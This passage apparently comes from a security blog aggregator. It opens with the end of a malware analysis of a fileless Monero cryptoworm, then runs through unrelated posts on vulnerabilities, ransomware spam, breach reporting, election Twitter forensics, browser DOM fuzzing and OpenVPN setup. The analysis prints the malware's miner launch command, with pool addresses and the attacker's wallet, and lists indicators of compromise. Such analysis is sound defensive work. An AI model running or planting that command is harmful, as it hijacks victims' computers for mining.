w.run "%temp%\taskservice.exe  -B -o stratum+tcp://pool.supportxmr.com:80 -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE  -o stratum+tcp://mine.xmrpool.net:80  -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://pool.minemonero.pro:80   -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
Many interesting other sections should be analyzed but for now lets stop here.

IOC.

Please find some of the most interesting IoC for you convenience.

- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309

Conclusion.

We are facing one of the first complex delivery of cryptocoin mining Malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz Malware which basically dropped on the target machine a BitCoin Miner, so if you are wondering: Why Marco do you write: "one of the first Malware" ? Well actually I wrote one of the "first complex" delivery. Usual coins Malware are delivered with no propagation modules, with no exploiting module and with not file-less techniques. In fact, the way this Monero CPU Miner has been delivered, includes advanced methodologies of memory inflation, where the unpacked Malware is not saved on Hard Drive (a technique to bypass some Anti Virus) but it is inflated directly on memory and called directly from memory itself. 

We can consider this Malware as a last generation of -all in memory- CryptoWorm. 

Another interesting observation, at least on my personal point of view, comes from the first stage. Why the attacker included this useless stage ? It appears to be not useful at all, it's a mere dropper wth no controls nor evasions. The attacker could have delivered just the second stage within the first stage in it, assuring a more stealth network fingerprint. So why the attacker decided to deliver the CryptoWorm through the first stage ? Maybe the first stage is part of a bigger framework ? Are we facing a new generation of Malware Generator Kits ? 

I wont really answering to such a questions right now, but contrary I'd like to take my readers thinking about it.

Have fun

Cryptopp Crypto++ 5.6.4 octets Remote Code Execution Vulnerability

Crypto++ (aka cryptopp and libcrypto++) 5.6.4 contained a bug in its ASN.1 BER decoding routine. The library will allocate a memory block based on the length field of the ASN.1 object. If there is not enough content octets in the ASN.1 object, then the function will fail and the memory block will be zeroed even if its unused. There is a noticeable delay during the wipe for a large allocation.

Phpipam 1.2 Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in phpipam 1.2. The vulnerabilities exist due to insufficient filtration of user-supplied data passed to several pages (instructions in app/admin/instructions/preview.php; subnetId in app/admin/powerDNS/refresh-ptr-records.php). An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.

QOTD – SEC Chair Clayton on Cyber Risk Disclosures

[W]e are continuing to examine whether public companies are taking appropriate action to inform investors, including after a breach has occurred, and we will investigate issuers that mislead investors about material cybersecurity risks or data breaches.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "AutoPosted PI Notifier"

This spam has a .7z file leading to Locky ransomware. From:      "AutoPosted PI Notifier" [NoReplyMailbox@redacted.tld] Subject:      Invoice PIS9344608 Date:      Tue, September 26, 2017 5:29 pm Please find Invoice PIS9344608 attached. The number referenced in the spam varies, but attached is a .7z archive file with a matching filename. In turn, this contains one of a number of malicious VBS

“Preparing for Cyber Security Incidents”

This blog post was written by ICS515 instructor,Kai Thomsen. Talk with any incident responder and you'll learn that there are a few less glamorous parts of the job. Writing the final report and preparation in advance to an incident are probably top contenders. In this article I want to focus on preparation and explain to … Continue reading Preparing for Cyber Security Incidents

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?)

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

QOTD – Raskin on Cybersecurity as Shared Responsibility

Understanding and dealing with the cyber threat has, due to your efforts, seeped from the IT shop and into the CEO shop.  Responsibility is now shared. In fact, this new shared responsibility, among IT experts, the CEO, and the board of directors, has been the most noticeable trend in governance from my time in the industry, in state government, and in the federal government.  Bankers rarely used to talk to me much about cybersecurity.  Now, this is one topic that comes up every day.
-- Treasury Deputy Secretary Sarah Bloom Raskin

Src: Remarks of Deputy Secretary Raskin at The Texas Bankers’ Association Executive Leadership Cybersecurity Conference

Twitter Forensics From The 2017 German Election

Over the past month, I’ve pointed Twitter analytics scripts at a set of search terms relevant to the German elections in order to study trends and look for interference.

Germans aren’t all that into Twitter. During European waking hours Tweets in German make up less than 0.5% of all Tweets published.

Data collected from the 1% sample stream (gardenhose)

Over the last month, Twitter activity around German election keywords has hovered at between 2 and 5 Tweets per second. Exceptions only occurred during the TV Debate (Sunday September 3rd 2017) and the day of voting (Sunday September 24th 2017). Surprisingly, Tweets volumes were still low on Saturday September 23rd 2017 – the day before votes were cast.

Here’s how things looked on Friday and Saturday:

Prior to polls closing on Sunday, Tweet volumes reached a sustained 10 Tweets per second. Once exit polls were announced, volumes exploded.

That sudden drop is my script not handling the volume all too well

Over the past month, topics related to the AfD party were pushed rather heavily on Twitter. This snapshot, taken on Thursday 21st September, is pretty similar to every one observed during the whole month.

Here’s an example of another trend I observed throughout the entire month regarding #afd hashtag volumes:

Notice that the Tweet volumes follow an organic pattern, trailing off during night hours. This contrasts what I observed during the French elections earlier this year, where #macronleaks hashtags were pushed by bots, and maintained a constant volume regardless of the time of day. Despite the high volume of AfD-related Twitter content being posted, AfD didn’t show up in Twitter’s own German trends at any point.

The terms “migrant”, “refugee”, “islam” were mentioned a fair bit in Tweets. Here’s what happened over the weekend.

Ben Nimmo of @DFRLab noticed that a hashtag named #wahlbetrug (election fraud) was being amplified by commercial Twitter bots on Saturday. This story was also picked up by the German publication Bild. My scripts also saw the hashtag briefly enter the top 10 during that day.


Here’s a Tweet timeline of this hashtag, since it’s appearance.

Looking at a timeline of Tweets using this hashtag shows the presence of certain more active accounts pushing this message.

Accounts retweeting Tweets containing the #wahlbetrug hashtag

Accounts replying to Tweets containing #wahlbetrug

Shortly after exit polls were published, the hashtag #fckafd surfaced.

The timeline of this particular hashtag is distinctly different.

However a number of highly active amplifiers were involved in both cases.

Highly active amplifiers of the #fckafd hashtag

Highly active amplifiers of the #wahlbetrug hashtag

This data illustrates how tricky it is to automate the discovery of artificially amplified Tweets. While the #wahlbetrug hashtag was indeed amplified by paid commercial botnets, it didn’t make a splash, and Twitter users would have most likely have needed to go searching for pro-AfD Tweets to find it.

A few Twitter users posted very actively during the campaign. Over the weekend, @Teletubbies007, @Jensjehagen, and @nanniag were very active.

@Teletubbies007 was the top tweeter of the #AfD, #btw17, #gehwaehlen, #reconquista, #traudichdeutschland, #wahlbeobachter, #wahlbeobachter, and #weidel hashtags.

Jensjehagen published the most retweets over the weekend.

The @AfD account was the most mentioned Twitter account.

Tools for automating Twitter activity (such as IFTTT) appeared in the top 10 of sources captured during the weekend.

Tweets published by highly active accounts made up about 3.5% of all traffic during the weekend. I had no accurate way of measuring the number of Tweets originating from commercial bot nets, and hence can’t give an estimation as to how much traffic those were responsible for.

My scripts were also configured to look for specific patterns in Tweets and metadata associated with users’ accounts in order to calculate how much activity originated from “alt-right” groups pushing right-wing agenda. Rough calculations from this data suggest that as much as 15% of all Twitter traffic associated with the German election fit this pattern.

Of the roughly 1.2 million Tweets processed between Friday afternoon and Sunday night, about 170,000 Tweets were matched by that bit of logic. These Tweets originated from about 3,300 accounts. This traffic was enough to generate the results seen in this article, but only to those looking at Twitter streams with automated tools, such as the ones I’m using.

Of note were a few videos and URLs that received a fair amount of retweets. The most obvious of these was a video posted by V_of_Europe showing an immigrant removing election campaign posters.

This was the second most retweeted Tweet I could find from the weekend (pertaining to the election itself). This Tweet was also pushed in other languages.

Another notable Tweet that showed up earlier in the weekend was a story about Merkel being booed at her final campaign rally in Munich. It didn’t get a whole lot of traction, though.

Plenty of links were shared to non-authoritative news sources. Here’s just one example…

…which was shared by this account…

Pay close attention to this user’s profile description

And on the same note, during the weekend, I saw plenty of non-German accounts Tweeting in German, and pushing links to questionable news sources.

I also captured plenty of pro-Trump accounts posting in English.

Another interesting story that failed to gain traction was one about an election results leak prior to the end of voting.

Across the duration of my analysis, 200,000 individual URLs were shared. Around 418,000 Tweets contained those URLs. Of those Tweets, only some 500 linked to questionable political content, which were shared in about 4,000 Tweets. Of the 400,000 unique Twitter users observed participating in this discussion, about 3,000 users were responsible for sharing “fake news” links. By and large, the accounts sharing these links didn’t look like bots.

Merkel was the most seen word in Tweets that shared links to political agenda articles.

Overall, German language Tweets made up roughly 60% of all Tweets during the run-up to the election.

At the time of writing, the most retweeted Tweet I can find pertaining to the election is this one, which has already received over 10,000 retweets.

Also, it’s nice to see that Russians themselves have a sense of humor when it comes to all the allegations of election interference.

Given the lack of German participation on Twitter, it seems to me that the heavy right-wing messaging push that’s been going on during the German election cycle has been more about recruiting new members into the alt-right than it’s been about election interference.

The Hay CFP Management Method

By Andrew Hay, Co-Founder and CTO, LEO Cyber Security.

I speak at a lot of conferences around the world. As a result, people often ask me how I manage the vast number of abstracts and security call for papers (CFPs) submissions. So I thought I’d create a blog post to explain my process. For lack of a better name, let’s call it the Hay CFP Management Method. It should be noted that this method could be applied to any number of things from blog posts to white papers and scholastic articles to news stories. I have successfully proven this methodology for both myself and my teams at OpenDNS, DataGravity, and LEO Cyber Security. Staying organized helped manage the deluge of events, submitted talks, and important due dates in addition to helping me keep track of where in the world my team was and what they were talking about.

I, like most people, started managing abstracts and submissions by relying on email searches and documents (both local and on Google Drive, Dropbox, etc.). Unfortunately, I didn’t find this scaled very well as I kept losing track of submitted vs. accepted/rejected talks and their corresponding dates. It certainly didn’t scale when it was applied to an entire team as opposed to a single individual.

Enter Trello, a popular (and freemium) web-based project management application that utilizes the Kanban methodology for organizing projects (boards), lists (task lists), and tasks (cards). In late September I start by creating a board for the upcoming year (let’s call this board the 2018 Conference CFP Calendar) and, if not already created, a board to track my abstracts in their development lifecycle (let’s call this board Talk Abstracts).

Within the Talk Abstracts board, I create several lists to act as swim lanes for my conference abstracts and other useful information. These lists are:

* Development: These are talks that are actively being developed and are not yet ready for prime time.
* Completed: These are talks that have finished development and are ready to be delivered at an upcoming event.
* Delivered: These are talks that have been delivered at least once.
* Misc: This list is where I keep my frequently requested form information such as my short bio (less than 50 characters), long bio (less than 1,500 characters), business mailing address (instead of browsing to your corporate website every time), and CISSP number (because who can remember that?).
* Retired: As a personal rule, I only use a particular talk for one calendar year. When I feel as though the talk is stale, boring, or stops being accepted, I move the card to this list. That’s not to say you can’t revive a talk or topic in the future as a “version 2.0”. This is why keeping the card around is valuable.

Within the 2018 Conference CFP Calendar board, I create several lists to act as swim lanes for my various CFPs. These lists are:

* CFP open: This is where I put all of the upcoming conference cards that I know about even if I do not yet know the exact details (such as location, CFP open/close, etc.).
* CFP closes in < 30 days: This is where I put the upcoming conference cards that have a confirmed closing date within the next 30 days. Note, it is very important to record details in the cards such as closing date, conference CFP mechanism (e.g. email vs. web form), and any related URLs for the event.
* Submitted: These are the conferences that I have submitted to and the associated cards. Note, I always provide a link to the abstract I submitted as a way to remind myself what I’m talking about.
* Accepted: These are the accepted talk cards. Note, I always put a copy of the email (or link to) acceptance notification to record any details that might be important down the road. I also make sure to change the date on the card to that of the speaking date and time slot to help keep me organized.
* Attending but not presenting: This is really a generic catch-all for events that I need to be at but may not be speaking at (e.g. booth duty, attending training, etc.). The card and associated dates help keep my dance card organized.
* Accepted but backed out: Sometimes life happens. This list contains cards of conference submissions that I had to back out of for one reason or another. I keep these cards in their own column to show me what was successfully accepted and might be a fit for next year in addition to the reason I had to back out (e.g. conflict, personal issue, alien abduction, etc.).
* Completed: This list is for completed talk cards. Again, I keep these to reference for next year’s board as it provides some ballpark dates for when the CFP opens, closes, as well as the venue and conference date.
* Rejected: They’re not all winners and not everybody gets every talk accepted. In my opinion, keeping track of your rejected talks is as (if not more) important as keeping track of your accepted talks. Not only does it allow you to see what didn’t work for that particular event, but it also allows you to record reviewer feedback on the submission and maybe submit a different style or type of abstract in the future.
* Not doing 2018: This is the list where I put conference cards that I’ve missed the deadline on (hey, it happens), cannot submit to because of a conflict, or simply choose to not submit a talk to.

It should be noted that I keep the above lists in the same order every year to help minimize my development time against the Trello API for my visualization dashboard (which I will explain in a future blog post). This might sound like a lot of work but once you’ve set this board up you can reuse it every year. In fact, it’s much easier to copy last year’s board than starting fresh every year, as it brings the cards and details over. Then all you need to do is update the old cards with the new venue, dates, and URLs.

Now that we have our board structure created we need to start populating the lists with the cards – which I’ll explain in the next blog post. In addition to the card blog post, I’ll explain two other components of the process in subsequent posts. For reference, here are the upcoming blog posts that will build on this one:

* Individual cards and their structure
* Moving cards through the pipeline
* Visualizing your board (and why it helps)

The post The Hay CFP Management Method appeared first on LEO Cyber Security.

Startup Security Weekly #56 – A Huge Week

Don Pezet and Tim Broom of ITProTV join us. In the news, building successful products, the most important startup question, and updates from McAfee, Slack, ThreatStack, and more on this episode of Startup Security Weekly!Full Show Notes: https://wiki.securityweekly.com/SSWEpisode56Visit https://www.securityweekly.com/ssw for all the latest episodes!

Phantom RDoS Might Be a Fake Ploy, But Beware

A group that calls itself Phantom Squad has launched an email-based ransomware DDoS (RDoS) extortion campaign against thousands of companies across the globe in the past week. They are threatening to launch DDoS attacks on their target victims on September 30 unless each victim pays about $700 in bitcoin. Fortunately, it appears this is only a group of extortionists making idle threats. Security experts predict that this group’s bark is worse than its bite; i.e., they doubt that Phantom Group has the technical power to actually launch multiple DDoS attacks on various targets. Unfortunately, there are hackers out there who do real damage by installing ransomware and launching a DDoS attack, and such attacks are becoming all too common.

DDoS and ransomware attacks often go hand in hand, and they can take two forms: 1) a threat of DDoS unless the victim pays the extortion fee or 2) a DDoS attack that precedes the ransomware installation. In most cases, it is the latter. A short, sub-saturating DDoS attack, which usually lasts less than five minutes, can serve as a smokescreen that distracts IT security staff from a more dangerous infiltration of the network. While IT staff scramble to troubleshoot “noise” on the network, hackers can find pathways and test for vulnerabilities within a network which can later be exploited through other techniques. They can subtly take down a firewall and install malware that may “sleep” on the network until it is remotely activated. Also, some low-threshold DDoS attacks go completely unnoticed by IT security staff.

If your company is unlucky enough to be the target of an RDoS attack here are some basic rules to follow:

  1. Don’t pay the ransom. You can’t trust that hackers will honor their word and not launch a DDoS attack on you. Furthermore, by rewarding the hacker’s bad behavior you would be encouraging it; they (or other cyber criminals) are likely to hit you a second time in the future, or to hit another company.
  2. Report the incident to local law enforcement.
  3. Patch software, firmware and operating systems.
  4. Train your employees to know how to avoid cyber threats such as phishing emails.
  5. Take a proactive stance to prevent the threat of a future DDoS attack. Automated DDoS mitigation technology can instantly detect and block DDoS attacks, without blocking any of the good traffic, giving your company peace of mind.

Some of Corero’s customers have experienced cyber extortion attempts and, in cases where the hackers did launch a DDoS attack against their network after our customer did not pay a ransom, the Corero SmartWall® Threat Defense System held strong and fended off the attacks.

For more information, contact us.

DDoS Ransom

QOTD – Admiral Rogers on Cyber War

Cyber war is not some future concept or cinematic spectacle, it is real and here to stay.
[...]
Conflict in the cyber domain is not simply a continuation of kinetic operations by digital means, nor is it some Science Fiction clash of robot armies.

-- Admiral Michael Rogers, Commander of US Cyber Command,
Testimony before US House Committee on Armed Service (May 2017)

Src: Docs.House.Gov

Science of CyberSecurity: Latest Cyber Security Threats

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 5 of 5.

Q. What keeps you up at night in the context of the cyber environment that the world finds itself in?
The growing dependence and integration of connected computers within our daily lives, means we are embarking on an era where cyber attacks will endanger our lives. Networked and complex IT systems are inherently insecure, meaning it is open season for nation-states, cyber terrorists and the curious to attack these life integrated emerging technologies, from driverless cars and countless new home IoT devices. I fear it will only be a matter time before a cyber attack causes human harm or even loss of life. The impact of the recent NHS ransomware attack serves as a warning, this cyber attack directly caused the closure of accidental and energy departments and the cancellation of operations. The future threats posed artificial intelligence and quantum computing are also growing concerns for cyber security, and well worth keeping an eye as these technologies continue to progress.

A Change In Context

Today marks the end of my first week in a new job. As of this past Monday, I am now a Manager, Security Engineering, with Pearson. I'll be handling a variety of responsibilities, initially mixed between security architecture and team management. I view this opportunity as a chance to reset my career after the myriad challenges experienced over the past decade. In particular, I will now finally be able to say I've had administrative responsibility for personnel, lack of which having held me back from career progression these past few years.

This change is a welcome one, and it will also be momentous in that it will see us leaving the NoVA/DC area next Summer. The destination is not finalized, but it seems likely to be Denver. While it's not the same as being in Montana, it's the Rockies and at elevation, which sounds good to me. Not to mention I know several people in the area and, in general, like it. Which is not to say that we dislike where we live today (despite the high price tag). It's just time for a change of scenery.

I plan to continue writing on the side here (and on LinkedIn), but the pace of writing may slow again in the short-term while I dedicate most of my energy to ramping up the day job. The good news, however, is this will afford me the opportunity to continue getting "real world" experience that can be translated and related in a hopefully meaningful manner.

Until next time, thanks and good luck!

Science of CyberSecurity: What Cyber Security Blogs to Follow

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 4 of 5.


Q. Do you recommend a particular cyber security blog that our readers could follow?
Of course, my own IT Security Expert Blog, and my Twitter accounts @SecurityExpert and @SecurityToday are well worth following.  My two favourite blogs are Bruce Schneier’s blog, Bruce is a true rock star of the industry, and Krebs on Security blog is also an excellent read, Brian provides the behind the scenes details of the latest hacking techniques and data breaches, and pulls no punches with his opinions. Both these bloggers have books that are a must read for budding cyber security professionals as well.

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero

Introduction

Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.

As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.

We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.

Setup

We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.

Here are additional details of the fuzzing setup for each browser:

  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.

Results

Without further ado, the number of security bugs found in each browsers are captured in the table below.

Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release).

Vendor
Browser
Engine
Number of Bugs
Project Zero Bug IDs
Google
Chrome
Blink
2
994, 1024
Mozilla
Firefox
Gecko
4**
1130, 1155, 1160, 1185
Microsoft
Internet Explorer
Trident
4
1011, 1076, 1118, 1233
Microsoft
Edge
EdgeHtml
6
1011, 1254, 1255, 1264, 1301, 1309
Apple
Safari
WebKit
17
999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
Total
31*
*While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.

All of the bugs listed here have been fixed in the current shipping versions of the browsers. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!

When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns IE process which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe
  4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.
  5. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes
  7. Periodically minimize the corpus using the AFL’s cmin algorithm.
  8. Go to step 1.

The following set of mutations was used to produce new samples from the existing ones:

  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion

As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.

The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Tips / Solutions for settings up OpenVPN on Debian 9 within Proxmox / LCX containers

When I tried to migrate my OpenVPN setup to a container on my new Proxmox server I run into multiple problems, where searching through the Internet provided solutions that did not work or were out of date. So I thought I put everything one needs to setup OpenVPN on Debian 9 within a Proxmox / LXC container together in one blog post.

 

Getting a TUN device into the unprivileged container

As you really should run container in unprivileged mode the typical solutions with adding/allowing

lxc.cgroup.devices.allow: c 10:200 rwm

won’t work. And running a container in privileged mode is a bad bad idea, but gladly there is a native LXC solution.

Stop the container with

pct stop <containerid>

Add following line to /etc/pve/lxc/<containerid>.conf

lxc.mount.entry = /dev/net/tun dev/net/tun none bind,create=file

start the container with

pct start <containerid>

OpenVPN will now be able to create a tun device. Just do a test run with

openvpn --config /etc/openvpn/blabla.conf

 

Add OpenVPN config files to the “autostart”

You need to put the OpenVPN files into /etc/openvpn/ with the extension .conf. And if you add a new file you need to run

systemctl daemon-reload

before doing a service openvpn restart.

Changes in existing config files don’t need the systemd reload.

 

Getting systemd to start openvpn within a unprivileged container

So OpenVPN works now manually but not with the “init” script. You see following error message in the log file
daemon() failed or unsupported: Resource temporarily unavailable (errno=11)

To solve this edit

/lib/systemd/system/openvpn@.service

and but a # in front of

LimitNPROC=10

now reload systemd with

systemctl daemon-reload

and it should work.

 

Hope that info/tips helped you to solve the problems faster than I did. 🙂 If you know some other tips / solutions for running OpenVPN in a Debian 9 container withing LXC / Proxmox write a comment! Thx!

